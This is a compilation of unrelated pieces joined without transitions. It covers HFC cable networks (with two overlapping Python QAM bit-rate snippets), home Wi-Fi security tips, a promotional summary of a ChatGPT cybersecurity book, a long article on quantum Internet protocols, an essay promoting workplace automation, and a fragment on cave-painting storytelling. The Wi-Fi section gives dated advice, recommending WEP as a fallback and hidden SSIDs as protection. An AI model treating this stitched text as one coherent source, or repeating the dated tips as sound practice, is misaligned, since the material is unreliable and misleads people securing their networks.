The coaxial cable that enters subscribers’ homes is a flexible, small “drop” cable that will connect directly to the cable modem, the set-top box or other consumer premise equipment. The RF signal on the coaxial cable is strong enough to allow signals to be split in different directions within the home. Sometimes the number of separate devices in the home is so large that amplification may be required. In this instance, a drop amp or house amp is used. Often, the splitters and amplifier are combined to reduce the number of connections.
The term HFC also implies the way in which signals are transported through the network. All HFC networks use frequency division multiplexing to pack the content into the spectrum slots of a cable plant. Spectrum in this case is typically referred to as the frequency bands that carry the content – 52MHz to 1004MHz for the forward, (headend to subscriber), and 5-42MHz for the reverse (subscriber to headend) in the US. Across the globe, spectrum allocations and split frequencies vary. Downstream and upstream are terms also used to describe these bands, respectively.
Signals that originate in the headend that must be transported to the subscriber are either analog or modulated with a scheme called quadrature amplitude modulation (QAM). QAM signals are generated by taking a digital representation of the original signal, whether it is an analog voice or video signal, and converting it by sampling and modulating a carrier. The resulting QAM signal is a high-capacity analog signal, which requires care in maintaining a high level of signal-to-noise ratio (SNR). This contrasts with a digital optical signal as used in GEPON or GPON (gigabit passive optical networks), for which SNR equivalent requirements are much simpler.
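As a rough worked example, the raw bit rate of a QAM channel is the symbol rate multiplied by the bits carried per symbol (log2 of the constellation size). The Python sketch below assumes the roughly 5.36 million symbols per second of a North American 6 MHz DOCSIS channel:

```python
# Raw bit rate of a QAM channel = symbol_rate * log2(M).
import math

symbol_rate = 5.36e6   # symbols/sec for 256-QAM in a 6 MHz DOCSIS channel
                       # (64-QAM actually runs slightly lower, ~5.06e6)
for m in (64, 256):
    bits_per_symbol = math.log2(m)
    raw_mbps = symbol_rate * bits_per_symbol / 1e6
    print(f"{m}-QAM: {bits_per_symbol:.0f} bits/symbol -> ~{raw_mbps:.1f} Mbps raw")

# Forward error correction and framing overhead reduce the usable payload;
# a 256-QAM channel delivers roughly 38-39 Mbps of usable DOCSIS throughput.
```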
The standard that governs QAM transport is managed by CableLabs, a non-profit industry funded R&D organization, and is called Data Over Cable Service Interface Specification, or DOCSIS. Currently, DOCSIS 3.0 is the most widely deployed. The newest version, DOCSIS 3.1, significantly improves the modulation rates and data throughput to subscribers, also expanding the downstream to 1200MHz and beyond, and the upstream to 85MHz and beyond.
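As a rough back-of-the-envelope illustration of what those spectrum and modulation figures mean for capacity, the Python sketch below multiplies out the downstream numbers quoted above. The 6MHz channel spacing and ~5.36 Msym/s symbol rate per 256-QAM channel are typical North American values and are my assumptions here, not figures from this post:

```python
# Rough downstream capacity estimate for a North American HFC plant.
# Assumptions: 6 MHz channel spacing and ~5.36 Msym/s per 256-QAM
# channel (typical NA values); real plants and DOCSIS versions vary.

downstream_mhz = 1004 - 52            # usable forward spectrum (MHz)
channel_mhz = 6                       # channel spacing (MHz)
symbol_rate = 5.36e6                  # symbols/s per channel
bits_per_symbol = 8                   # 256-QAM carries log2(256) = 8 bits

channels = downstream_mhz // channel_mhz
raw_bps_per_channel = symbol_rate * bits_per_symbol
aggregate_gbps = channels * raw_bps_per_channel / 1e9

print(f"{channels} channels x {raw_bps_per_channel / 1e6:.1f} Mbps "
      f"= ~{aggregate_gbps:.1f} Gbps aggregate, before protocol overhead")
```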
So, how do MSOs seamlessly transition HFC to fiber-to-the-home? Stay tuned for another post on successful strategies.
*A significant consideration as to the size of the service area is the amount of bandwidth a subscriber consumes. As each HFC node has a direct connection back to the headend, smaller service areas get access to more data-per-home-passed delivered from the headend.
Protecting Wireless Networks
Using a wireless network in your home gives you the convenience of being able to use your computer virtually anywhere in your house — and still be able to connect to other computers on your network or access the Internet. However, if your wireless network is not secure, there are significant risks. For example, a hacker could:
- Intercept any data that you send or receive
- Gain access to your shared files
- Hijack your Internet connection — and use up your bandwidth or download limit
Internet Security tips — to help you protect your wireless network
Here are some simple steps you can take to protect your wireless network and router:
- Avoid using the default password
It’s easy for a hacker to find out the manufacturer’s default password for your wireless router — and then use that password to access your wireless network. So it’s wise to change the administrator password for your wireless router. When you’re deciding on your new password, try to pick a complex series of numbers and letters — and try to avoid using a password that can be guessed easily. (For one way to generate such a password, see the sketch after this list.)
- Don’t let your wireless device announce its presence
Switch off SSID (Service Set Identifier) broadcasting — to prevent your wireless device announcing its presence to the world.
- Change your device’s SSID name
Again, it’s easy for a hacker to find out the manufacturer’s default SSID name for your device — and then use that to locate your wireless network. Change the default SSID name of your device — and try to avoid using a name that can be guessed easily.
- Encrypt your data
In your connection settings, make sure you enable encryption. If your device supports WPA encryption (or the newer WPA2/WPA3), use that — if not, fall back to WEP, which is weaker but still better than no encryption at all.
- Protect against malware and Internet attacks
Make sure you install a rigorous anti-malware product on all of your computers and other devices. In order to keep your anti-malware protection up to date, select the automatic update option within the product.
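As a small, concrete illustration of the first tip, here is a minimal Python sketch for generating a hard-to-guess router password using only the standard library; the 16-character length and the symbol set are arbitrary choices of mine:

```python
import secrets
import string

def generate_password(length: int = 16) -> str:
    """Return a random password drawn from letters, digits and symbols."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*-_"
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # e.g. 'q7G!mX2_-vR9@kLw'
```

The `secrets` module draws from the operating system's cryptographically secure random source, which is what you want for passwords, unlike the general-purpose `random` module.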
"Mastering Cybersecurity with ChatGPT" by Mohamed Atef explores artificial intelligence (AI) tools, particularly ChatGPT, in cybersecurity. There are numerous cybersecurity books on the market, but this book of computer science provides a comprehensive overview of ChatGPT's capabilities and practical applications in various cybersecurity fields. These domains include threat analysis, incident management, risk mitigation, and policy enforcement.
Cybersecurity is a critical issue in the digital age, as organizations across various industries face increasingly sophisticated cyber threats. To effectively protect against these threats, cybersecurity professionals need to constantly adapt and develop effective strategies and tools to stay ahead of attackers.
Artificial intelligence has emerged as a game-changing tool in cybersecurity, providing advanced analytics capabilities to identify and respond to threats quickly and effectively. One of the most promising AI tools in this area is ChatGPT. In response to various prompts, this language model generates human-like responses.
ChatGPT can be used to enhance cybersecurity. For example, it can be used to analyze threat intelligence, automate incident response, assess and mitigate risks, and enforce security policies and standards. This book explores these applications in detail and includes step-by-step tutorials and real-world examples to help readers understand how to implement ChatGPT effectively in their cybersecurity strategies.
The book is divided into different chapters, each focusing on a specific aspect of cybersecurity. One of the chapters provides an overview of ChatGPT's features and capabilities, as well as the advantages and limitations of AI tools in cybersecurity. The chapter sets the foundation for the rest of the book, providing readers with a basic understanding of ChatGPT's capabilities and practical applications.
Another chapter focuses on threat analysis and how ChatGPT can be used to identify and analyze various cyber threats. The chapter covers different types of threat intelligence, including dark web monitoring, and how ChatGPT can help generate relevant information to mitigate these threats.
The next chapter delves into incident management, explaining how ChatGPT can be used to detect and respond to security incidents effectively. The chapter highlights how ChatGPT can provide real-time alerts, automate incident response, and streamline communication between different teams involved in incident management.
Chapter four explores risk mitigation and how ChatGPT can be used to assess and manage different cybersecurity risks. The chapter covers risk management and how ChatGPT can analyze data and provide actionable insights, enabling you to mitigate risks effectively.
The following chapter focuses on policy enforcement, discussing how ChatGPT can enforce security policies and standards. The chapter highlights how ChatGPT can help automate compliance checks, monitor policy violations, and provide recommendations to improve compliance.
The next one addresses the ethical implications of AI-driven solutions in cybersecurity, discussing the potential risks and limitations of using AI tools in digital security. The chapter also highlights the importance of transparency, fairness, and accountability in AI-driven solutions.
Finally, the last chapter features case studies and expert advice, demonstrating the impact of AI-driven solutions on the future of the cybersecurity industry. Overall, "Mastering Cybersecurity with ChatGPT" is an informative and practical guide for anyone interested in the intersection of cybersecurity and AI. The book provides readers with a comprehensive understanding of ChatGPT's capabilities and how it can be used to enhance cybersecurity across various domains.
Quantum computers were proposed forty years ago, but have yet to make any real impact in the world. Researchers are struggling to get significant amounts of processing power from systems that have to be kept close to absolute zero.
But at the same time, the quantum informatics community is already hard at work on the next step beyond individual quantum computers: an Internet that can connect them to work together.
You can already communicate with plenty of experimental quantum computers on the Internet. For instance, Amazon’s AWS Braket lets you build and test quantum algorithms on different quantum processors (D-Wave, IonQ, or Rigetti) or use a simulator.
Microsoft does something similar on Azure, and IBM also lets users play with a five-qubit quantum system.
Job done? Well no.
Sharing the output of isolated quantum computers is one thing; linking quantum computers up is something else.
The power of quantum computing is in having a large number of qubits, whose value is not determined till the end of the calculation. If you can link those “live” qubits, you’ve linked the internals of your quantum computers, and you’ve effectively created a bigger quantum computer.
Why link up quantum computers?
“It is hard to build quantum computers large enough to solve really big problems,” explains Vint Cerf, one of the Internet’s founders, in an email exchange with DCD.
The problem is harder because the quantum world creates errors: “You need a lot of physical qubits to make a much smaller number of logical qubits - because error correction requires a lot of physical qubits.”
So, we actually do need to make our quantum computers bigger.
But we want to link “live” qubits, rather than just sharing the quantum computer’s output. We want to distribute the internal states of that computer without collapsing the wave function - and that means distributing entanglement (see box).
The quantum Internet means taking quantum effects and distributing them across a network. That turns out to be very complex - but potentially very powerful.
“Scaling of quantum computers is facilitated by the distribution of entanglement,” says Cerf, who works at Google. “In theory, you can make a larger quantum system if you can distribute entanglement to a larger number of distinct quantum machines.”
There’s a problem though.
There are several approaches to building qubits for the development of quantum computers, including superconducting junctions, trapped-ion quantum computers, and others based on photons. One thing they all have in common is they have to be isolated from the world in order to function.
The qubits have to maintain a state of quantum coherence, in which all the quantum states can exist, like the cat in Schrödinger’s famous paradox that is both alive and dead - as long as the box is kept closed. So how do you communicate with a sealed box?
National quantum Internet
That question is being asked at tech companies like Google, and at universities around the world. Europe has the Quantum Internet Alliance, a grouping of multiple universities and bodies including QuTech, and the US has Q-Next, the US national quantum information science program, headed by University of Chicago Professor David Awschalom.
The US Department of Energy thinks the question is important enough to fund, and has supported projects at Q-Next lead partner, the Argonne National Laboratory. Among its successes, Q-Next has shared quantum states over a 52-mile fiber link which has become the nucleus of a possible future national quantum Internet.
Europe’s QIA has notched up some successes too, including the first network to connect three quantum processors, with quantum information passed through an intermediate node, created at the QuTech institute for quantum informatics.
Another QIA member, the Max Planck Institute, used a single photon to share quantum information - something which is important, as we shall see.
Over at Argonne, Martin Suchara, a scientist from the University of Chicago, has DoE funding for his work on quantum communications. But he echoes the difficulty of transmitting quantum information.
“The no-cloning theorem says, if you have a quantum state, you cannot copy it,” says Suchara. “This is really a big engineering challenge.”
Send for the standards body
With that much work going on, we are beginning to see the start of a quantum Internet.
But apart from the technical difficulty, there’s another danger. All these bodies could create several, incompatible quantum Internets. And that would betray what the original Internet was all about.
The Internet famously operates by “rough consensus and running code.” Engineers make sure things work, and can be duplicated in multiple systems, before setting them in stone.
For 35 years, the body that has ensured that running code has been the Internet Engineering Task Force (IETF). It’s the body that curates standards for anything added to our global nervous system.
Since the dawn of the Internet, the IETF has published standards known as “RFCs” (requests for comment). These define the network protocols which ensure your emails and your video chats can be received by other people.
If we are going to have a quantum Internet, we’ll need an RFC which sets out how quantum computers communicate.
Right now, that’s too blue-sky for the hands-on engineers and protocol designers of the IETF. So quantum Internet pioneers have taken their ideas to the IETF’s sister group, the forward-looking Internet Research Task Force (IRTF).
The IRTF has a Quantum Internet Research Group (QIRG), with two chairs: Rodney Van Meter, a professor at Keio University, Japan; and Wojciech Kozlowski at QuTech in Delft. QIRG has been quietly looking at developments that will introduce completely new ways to do networks.
“It is the transmission of qubits that draws the line between a genuine quantum network and a collection of quantum computers connected over a classical network,” says the QIRG’s document, Architectural Principles for a Quantum Internet. “A quantum network is defined as a collection of nodes that is able to exchange qubits and distribute entangled states amongst themselves.”
The work is creating a buzz. Before Covid-19 made IETF pause its in-person meetings, QIRG get-togethers drew quite an attendance, says Kozlowski, “but it was more on a kind of curiosity basis.”
Building up from fundamentals
The fundamental principle of quantum networking is distributing entanglement (see box), which can then be used to share the state of a qubit between different locations.
Suchara explains: “The trick is, you don't directly transmit the quantum state that is so precious to you: you distribute entanglement. Two photons are entangled, in a well-defined state that basically ties them together. And you transmit one of the photons of the pair over the network.”
He goes on: “Once you distribute the entanglement between the communicating endpoints, you can use what is called quantum teleportation to transmit the quantum state. It essentially consumes the entanglement and transmits the quantum state from point A to point B.”
“The quantum data itself never physically enters the network,” explains Kozlowski. “It is teleported directly to the remote end.”
Kozlowski points out that teleporting qubits is exciting, but distributing entanglement is the fundamental thing.
“For example, quantum key distribution can be run on the entanglement based network without any teleportation, and so can a bunch of other applications. Most quantum application protocols start from saying ‘I have a bunch of states,’ and teleportation is just one way of using these states.”
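To make "distributing entanglement" slightly more concrete, here is a minimal NumPy sketch (my own illustration, not code from any of the teams mentioned) that builds the Bell state these schemes rely on and samples the perfectly correlated measurement outcomes the two nodes would see:

```python
import numpy as np

# Two qubits start in |00>; apply H to qubit A, then a CNOT with A as
# control and B as target, producing the Bell state (|00> + |11>)/sqrt(2).
state = np.zeros(4)
state[0] = 1.0                                  # |00>
H = np.array([[1, 1], [1, -1]]) / np.sqrt(2)    # Hadamard gate
CNOT = np.array([[1, 0, 0, 0],
                 [0, 1, 0, 0],
                 [0, 0, 0, 1],
                 [0, 0, 1, 0]])
state = CNOT @ np.kron(H, np.eye(2)) @ state    # the entangled pair

# Individually each measurement is a coin flip, but the two nodes'
# results always agree - the correlation at the heart of entanglement.
probs = np.abs(state) ** 2                      # [0.5, 0, 0, 0.5]
rng = np.random.default_rng(0)
for outcome in rng.choice(4, size=5, p=probs):
    print(f"node A measured {outcome >> 1}, node B measured {outcome & 1}")
```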
Towards a quantum Internet protocol
In late 2020, Kozlowski co-authored a paper with colleagues at Delft, proposing a quantum Internet protocol, which sets an important precedent, by placing distributed entanglement into a framework similar to the layered stacks - OSI or TCP/IP - which define communication over classical networks.
“Our proposed stack was heavily inspired by TCP/IP, or OSI,” he tells us. “The definitions of each layer are slightly different, but there was this physical layer at the bottom, which was about attempting to generate entanglement.”
That word “attempting” is important, he says: “It fails a lot of the time. Then we have a link responsible for operating on a single link, between two quantum repeaters or an end node and a quantum repeater. The physical layer will say ‘I failed,’ or ‘I succeeded.’ The link layer would be responsible for managing that to eventually say, ‘Hey, I actually created entanglement for you.’”
The protocol has to keep track of which qubits are entangled on the different nodes, and this brings in a parallel network channel: “One important thing about distributing entanglement is the two nodes that end up with an entangled pair must agree which of their qubits are entangled with which qubits. One cannot just randomly use any qubit that's entangled.
"One has to be able to identify in the protocol, which qubit on one node is entangled with which qubit on the other node. If one does not keep track of that information, then these qubits are useless.”
“Let’s say these two nodes generate hundreds of entangled pairs, but only two of them are destined for a particular application, then that application must get the right qubits from the protocol stack. And those two qubits must be entangled with each other, not just any random qubit at the other node.”
The classical Internet has to transmit coordinating signals like this, but it can put them in a header to each data packet. This can’t happen on the quantum Internet, so “header” information has to go on a parallel channel, over the classical Internet.
“The thing that makes software and network protocols difficult for quantum is that one could imagine a packet which has a qubit as a payload, and has a header. But they never ever travel on the same channel. The qubit goes on the quantum channel, and the header would go on the classical channel.”
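To give a flavour of what those classical "headers" might carry, here is a purely hypothetical Python sketch of an entanglement-tracking control message; the field names and structure are my invention, not the Delft team's actual message format:

```python
from dataclasses import dataclass

@dataclass
class EntanglementInfo:
    """Classical control message describing one entangled pair.

    This record travels over the ordinary (classical) Internet;
    the qubits themselves never do.
    """
    pair_id: int        # identifier both nodes agree on for this Bell pair
    local_qubit: int    # which local memory qubit holds our half
    remote_node: str    # which node holds the other half
    remote_qubit: int   # which of their qubits is entangled with ours
    fidelity: float     # estimated quality of the entanglement

msg = EntanglementInfo(pair_id=42, local_qubit=3,
                       remote_node="repeater-1", remote_qubit=0,
                       fidelity=0.93)
print(msg)
```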
It needs a classical channel
“It is a hard requirement to have classical communication channels between all the nodes participating in the quantum network,” says Kozlowski.
In its protocol design, the Delft team took the opportunity to have headers on the classical Internet that don’t correspond to quantum payloads on the quantum Internet, says Kozlowski: “We chose a slightly different approach where the signaling and control messages are not directly coupled. We do have packets that contain control information, just like headers do. What is different, though, is that they do not necessarily have a payload attached to them.”
In practice, this means that the quantum Internet will always need the classical Internet to carry the header information. Every quantum node must also be on the classical Internet.
So a quantum Internet will have quantum information on the quantum plane, and a control plane operating in parallel on the classical Internet, handling the classical data it needs to complete the distribution of qubit entanglement.
Applications on top
The Delft proposal keeps things general, by putting teleportation up at the top, as an application running over the quantum Internet, not as a lower layer service. Kozlowski says earlier ideas suggested including teleportation in the transport layer, but “we have not proposed such a transport layer, because a lot of applications don't even need to teleport qubits.”
The Delft paper proposes a transport layer, which just operates directly on the entangled pair, to deliver services such as remote operations.
Over at Argonne, Suchara’s project has an eye on standards work, and agrees with the principles: “How should the quantum Internet protocol stack look like?” he asks. “It is likely that it will resemble in some way the OSI model. There will be layers and some portion of the protocol at the lowest layer will have to control the hardware.”
Like Kozlowski, he sees the lower layer managing photon detectors and quantum memories in repeater nodes.
Above that, he says, “the topmost layer is the application. There are certain actions you have to take for quantum teleportation to succeed. That's the topmost layer.
“And then there's all the stuff in the middle, to route the photons through the network. If you have a complicated topology, with multiple network nodes, you want to go beyond point to point communication; you want multiple users and multiple applications.”
Sorting out the middle layers creates a lot of open questions, says Suchara: “How can this be done efficiently? This is what we would like to answer.”
There is little danger of divergence at this stage, but over in Delft, Kozlowski’s colleagues, including quantum network leader Stephanie Wehner, have actually begun to write code towards an eventual quantum internet. While this article was being written, QuTech researchers published a paper, Experimental Demonstration of Entanglement Delivery Using a Quantum Network Stack. The introduction promises: “Our results mark a clear transition from physics experiments to quantum communication systems, which will enable the development and testing of components of future quantum networks.”
Putting this into practice brings up the next set of problems. Distributing entanglement relies on photons (particles of light), which quantum Internet researchers refer to as “flying qubits,” to contrast them with the stationary qubits in the end system, known as “matter qubits.”
The use of photons sounds reassuring. This is light. It’s the same stuff we send down fiber optic cables in the classical Internet. And one of the major qubit technologies in the lab is based on photons.
But there’s a difference here. For one thing, we’re working on quantum scales. A bit sent over a classical network will be a burst of light, containing many millions of photons. Flying qubits are made up of single (entangled) photons.
“In classical communication, you just encode your bit in thousands of photons, or create extra copies of your bit,” says Suchara. “In the quantum world, you cannot do that. You have to use a single photon to encode a quantum state. And if that single photon is lost, you lose your information.”
Also, the network needs to know if the flying qubit has been successfully launched. This means knowing if entanglement has been achieved, and that requires what the quantum pioneers call a “heralded entanglement generation scheme.”
Working with single photons over optical fiber has limits. Beyond a few km, it’s not possible. So the quantum Internet researchers have come up with “entanglement swapping.” A series of intermediate systems called “quantum repeaters” are set up, so that the remote end of a pair can be repeatedly teleported till it reaches its destination.
This is still not perfect. The fidelity of the copy degrades, so multiple qubits are used and “distilled” in a process called “quantum error correction.”
On one level that simply means repeating the process till it works, says Suchara. “You have these entangled photons and you transmit them. If some portion - even a very large portion - of these entangled pairs is lost, that's okay. You just need to get a few of them through.”
Kozlowski agrees: “The reason why distributed entanglement works, and qubit distribution doesn't work, is because when we distribute entanglement, it's in a known form. It's in what we call Bell states. So if one fails, if one is lost, one just creates it again.”
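The cost of "just creating it again" can be sketched with a toy loss model. Assuming a typical telecom-fiber attenuation of about 0.2 dB/km (a standard figure for 1550nm fiber, and my assumption rather than one quoted in this article), single-photon survival falls off exponentially with distance, and the expected number of attempts per delivered photon grows accordingly:

```python
LOSS_DB_PER_KM = 0.2   # typical attenuation of telecom fiber at 1550 nm

def survival_probability(km: float) -> float:
    """Probability that a single photon survives `km` of fiber."""
    return 10 ** (-LOSS_DB_PER_KM * km / 10)

for km in (1, 10, 50, 100):
    p = survival_probability(km)
    print(f"{km:>4} km: survival probability {p:.4f}, "
          f"~{1 / p:.0f} attempts per delivered photon on average")
```

At 100km the sketch predicts roughly one photon in a hundred arriving, which is why repeater chains that break a long link into short hops matter so much.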
Quantum repeaters will have to handle error correction and distillation, as well as routing and management.
But end nodes will be more complicated, says Kozlowski. “Quantum repeaters have to generate entanglement and do a bit of entanglement swapping. End nodes must have good capacity for a quantum memory that can hold qubits and can actually perform local processing instructions and operations. In addition to generating entanglement, one can then execute an application on it.”
Dealing with time
Quantum networks will also have to deal with other practical issues like timing. They will need incredible time synchronization because of the way entanglement is generated today.
Generating entanglement is more complicated than sending a single photon. Most proposed schemes send a photon from each end of the link to create an entangled pair at the midpoint.
“The two nodes will emit a photon towards a station that's in the middle,” says Kozlowski. “And these two photons have to meet at exactly the same time in the middle. There's very little tolerance, because the further apart they arrive, the lower quality the entanglement is.”
He is not kidding. Entanglement needs synchronization to nanosecond precision, with sub-nanosecond jitter of the clocks.
The best way to deliver timing is to include it in the physical layer, says Kozlowski. But there’s a question: “Should one synchronize just a link? Or should one synchronize the entire network to a nanosecond level? Obviously, synchronizing an entire network to a nanosecond level is difficult. It may be necessary, but I intuitively would say it's not necessary, I want to limit this nanosecond synchronization to each link.”
On a bigger scale, the quantum network has a mundane practical need to operate quickly. Quantum memories will have a short lifetime, as a qubit only lasts as long as it can be kept isolated from the environment.
“In general, one wants to do everything as fast as possible, as well, for the very simple reason that quantum memory is very short-lived,” says Kozlowski.
Networked quantum systems have to produce pairs of Bell states fast enough to get work done before stored qubits decay. But the process of making entangled pairs is still slow. Till that technology improves, quantum networked systems will achieve less, the further they are separated.
“Time is an expensive resource,” says the QIRG document. “Ultimately, it is the lifetime of quantum memories that imposes some of the most difficult conditions for operating an extended network of quantum nodes.”
As Vint Cerf says: “There is good work going on at Google on quantum computers. Others are working on quantum relays that preserve entanglement. The big issues are maintaining coherence long enough to get an answer. Note that the quantum network does have speed of light limitations despite the apparent distance-independent character of quantum entanglement. The photons take time to move on the quantum network. If entanglement dissipates with time, then speed of light delay contributes to that.”
Demands of standards
The Internet wouldn’t be the Internet if it didn’t insist on standards. So the QIRG has marked “homogeneity” as a challenge. The eventual quantum Internet, like today’s classical Internet, should operate just as well, regardless of whose hardware you are using.
Different quantum repeaters should work together, and different kinds of quantum computers should be able to use the network, just as the Internet doesn’t tell you what laptop to use.
At the moment, linking different kinds of quantum systems is a goal for the future, says Kozlowski: “Currently, they have to be the same, because different hardware setups have different requirements for what optical interaction they can sustain. When they go on the fiber, they get converted to the telecom frequency, and then it gets converted back when it's on the other end. And the story gets more complicated when one has to integrate between two different setups.”
“There is ongoing work to implement technology to allow crosstalk between different hardware platforms, but that's ongoing research work. It’s a goal,” he says. “Because this is such an early stage. We just have to live with the constraints we have. Very often, software is written to address near-term constraints, more than to aim for these higher lofty goals of full platform independence and physical layer independence.”
The communication has also got to be secure. On the classical Internet, security was an afterthought, because the original pioneers like Cerf were working in a close-knit community where everyone knew each other.
With 35 years of Internet experience to refer to, the QIRG is building in security from the outset. Fortunately, quantum cryptography is highly secure - and works on quantum networks, almost by definition.
As well as this, the QIRG wants a quantum Internet that is resilient and easy to monitor.
“I think participation in the standardization meetings, by the scientific community and potential users, is really important,” says Suchara. “Because there are some important architectural decisions to be made - and it's not clear how to make them.”
The quantum Internet will start local. While the QIRG is thinking about spanning kilometers, quantum computing startups can see the use in much smaller networks, says Steve Brierley CEO of Riverlane, a company impatient to hook up large enough quantum computers to do real work.
“The concept is to build well functioning modules, and then network them together,” says Brierley. “For now, this would be in the same room - potentially even in the same fridge.”
That level of networking “could happen over the next five years,” says Brierley. “In fact, there are already demonstrations of that today.”
Apart from anything else, long distance quantum networks will generate latencies. As we noted earlier, that will limit what can be done, because quantum data is very short-lived.
For now, not many people can be involved, says Kozlowski: “The hardware is currently still in the lab, and not really outside.”
But, for the researchers in those labs, Kozlowski says: “There's lots to do,” and the work is “really complicated. Everybody's pushing the limits, but when you want to compare it to the size and scope of the classical Internet, it's still basic.”
Professor Andreas Wallraff at ETH Zurich used an actual pipe to send microwave signals between two fridges.
The Max Planck Institute has shown quantum teleportation, to transmit quantum information from a qubit to a lab 50 meters away.
At QuTech, Professor Stephanie Wehner has shown a “link layer” protocol, which provides reliable links over an underlying quantum network. And QuTech has demonstrated a quantum network in which two nodes are linked with an intermediate repeater.
Over in the US at Argonne, Suchara is definitely starting small with his efforts at creating reliable communications. He is working on sharing quantum states, and doesn’t expect to personally link any quantum computers just yet.
For him, the first thing is to get systems well enough synchronized to handle basic quantum communications: “With FPGA boards, we already have a clock synchronization protocol that's working in the laboratory. We would like to achieve this clock synchronization in the network - and we think the first year of our project will focus on this.”
Suchara thinks that long-distance quantum computing is coming: “What's going to happen soon is connecting quantum computers that are in different cities, or really very far away."
Ideally, he thinks long links will use the same protocol suite, but he accepts short links might need different protocols from long distances: “The middle layers that get triggered into communication may be different for short and long distance communication. But I would say it is important to build a protocol suite that's as universal as possible. And I can tell you, one thing that makes the classical Internet so successful is the ability to interconnect heterogeneous networks.”
Suchara is already looking at heterogeneity: “There are different types of encoding of quantum information. One type is continuous variable. The other type is discrete variable. You can have hybrid entanglement between continuous variable and discrete variable systems. We want to explore the theoretical protocols that would allow connecting these systems - and also do a demonstration that would allow transmission of both of these types of entanglement on the Argonne Labs quantum link network.”
The Argonne group has a quantum network simulator to try out ideas: “We have a working prototype of the protocol. And a simulator that allows evaluation of alternative protocol design. It’s an open source tool that's available for the community. And our plan is to keep extending the simulator with new functionality.”
How far can it go?
Making quantum networks extend over long distances will be hard because of the imperfections of entanglement generation and of the repeaters, as well as the fact that single photons on a long fiber will eventually get lost.
“This is a technological limitation,” says Kozlowski. “Give us enough years and the hardware will be good enough to distribute entanglement over longer and longer distances.”
It’s not clear how quickly we’ll get there. Kozlowski estimates practical entanglement-based quantum networks might exist in 10 to 15 years.
This is actually a fast turnaround, and the quantum Internet will be skipping past decades of trial and error in the classical world by starting with layered protocol stacks and software-defined networking.
The step beyond to distributing quantum computing, will be a harder one to take, because at present quantum computers mostly use superconducting or trapped-ion qubits, and these don’t inherently interact with photons.
Why do it?
At this stage, it may all sound too complex. Why do it?
Professor Kozlowski spells out what the quantum Internet is not: “It is not aimed to replace the classical Internet. Because, just as a quantum computer will not replace a classical computer, certain things are done quite well, classically. And there's no need to replace that with quantum.”
One spin-off could be improvements to classical networks: “In my opinion, we should use this as an opportunity to improve certain aspects of the OSI model of classical control protocols,” says Suchara.
“For example, one of the issues with the current Internet is security of the control plane. And I think if you do a redesign, it's a great opportunity to build in more security mechanisms into the control plane to improve robustness. Obviously, the Internet has done great over the decades in almost every respect imaginable, but still one of the points that could be improved is the security of the control plane.”
Kozlowski agrees, pointing out that quantum key distribution exists, and there are other quantum cryptography primitives, that can deliver things like better authentication and more secure links.
The improvements in timing could also have benefits, including the creation of longer baseline radio telescopes, and other giant planetary instruments.
The big payoff could be distributing quantum computing, but Kozlowski sounds a note of caution: “Currently it's not 100 percent clear how one would do the computations. We have to first figure out how do we do computations on 10,000 computers, as opposed to one big computer.”
But Steve Brierley wants to see large, practical quantum computers which take high-performance computing (HPC) far beyond its current impressive achievements.
Thanks to today’s HPC systems, Brierley says: “We no longer ‘discover’ aircraft, we design them using fluid dynamics. We have a model of the underlying physics, and we use HPC to solve those equations.”
If quantum computers reach industrial scales, Brierley believes they could bring that same effect to other sectors like medicine, where we know the physics, but can’t yet solve the equations quickly enough.
“We still ‘discover’ new medicines,” he says. “We've decoded the human DNA sequence, but that's just a parts list.”
Creating a medicine means finding a chemical that locks into a specific site on a protein because of its shape and electrical properties. But predicting those interactions means solving equations for atoms in motion.
“Proteins move over time, and this creates more places for the molecule to bind,” he says. “Quantum mechanics tells us how molecules and proteins, atoms and electrons will move over time. But we don't have the compute to solve the equations. And as Richard Feynman put it, we never will, unless we build a quantum computer.”
A quantum computer that could invent any new medicine would be well worth the effort, he says: “I'd be disappointed if the only thing a quantum computer does is optimize some logistics route, or solve a number theory problem that we already know the answer to.”
To get there, it sounds like what we actually need is a distributed quantum computer. And for that, we need the quantum Internet.
This article first appeared in Issue 43 of DCD Magazine.
Every day, people can see the increased reach that intelligent machines have on our society, from self-checkouts at grocery stores to more intensive robots in manufacturing. Much of the labor force has seen these developments and met them with hesitation, wondering if their jobs were at risk. But workers should not fear this change, as it is simply a shift in how business will be done. It's not eliminating human workers altogether.
While workers worry about their jobs being replaced by intelligent machines in their future, they need to realize that these machines are quickly becoming the present condition of various industries. Automation is the status quo because it leads to a significant increase in productivity. But that doesn’t mean that human workers are disposable. Instead, it means that they should expect the nature and responsibilities of their job to change.
Several industries have already incorporated robots into their operations, and it isn’t just in manufacturing. Skilled workers such as surgeons have also seen their work supplemented by robots. But it should be looked at as such: a supplementation. The purpose of incorporating intelligent machines is not to replace human workers entirely. It is to increase their productivity by making their completion of tasks more efficient.
In the manufacturing industry alone, robot density per worker has doubled in the past five years. However, it takes time for these machines to reach their optimal level of productivity and cost-efficiency - time that allows workers to pick up the skills they need to shift from completing tasks hands-on to overseeing the work of those machines.
Ready or Not …
Workers need to understand that this shift is coming, whether they like it or not. And with the automation revolution set to occur within the next 15 years, they must act now before it is too late to change their position. Workers can become an integral part of this new way of conducting business by picking up additional skills and undergoing further training. If workers don’t fall victim to the mindset that robots are after their jobs, they will see that there are enormous opportunities opening for them that they may not have otherwise had.
Workers need to embrace the shift toward automation. People should not think that robots are taking their jobs. Instead, they should know that the skills they need to be successful in their occupation are changing. When a robot is installed, it doesn’t immediately begin to perform a task self-sufficiently. It requires oversight, and sometimes even operation, from its human counterparts.
One of the main things that must change before this automation revolution can occur is that the larger culture needs to embrace this shift towards intelligent machines. When pop culture is perpetuating the myth that machine intelligence is inherently evil, it is hard to convince the public that this change actually is beneficial to them. To help this shift occur, we need to ensure that these perceptions change on a mass scale.
Another thing that needs to occur before the widespread transition to automation is more acceptance of intelligent machines from a legal viewpoint. Although certain standards and protections need to be in place to protect those working alongside robots, further regulation can hinder innovation. That innovation is necessary for the field to progress to a point where human and machine workers coexist successfully.
At this point, it would be futile to resist the automation revolution, because it has already begun. However, workers can and should take steps to ensure that they are adapting with these changing industries. Although the adoption of this technology will be widespread, there is still time for workers to get ahead of the curve so that they do not become obsolete once the integration is complete.
The ancient cave paintings at Lascaux and Altamira may seem a long way from our world, but we share a common thread: the urge to tell stories and share insights. 40,000 years ago, people used stories to engage and document their daily lives, reporting about places, people and events. Not so different from today, though we have more powerful tools and data at hand.
In some respects, we may have shifted too far the other way: focusing more on gathering information than communicating what it means.
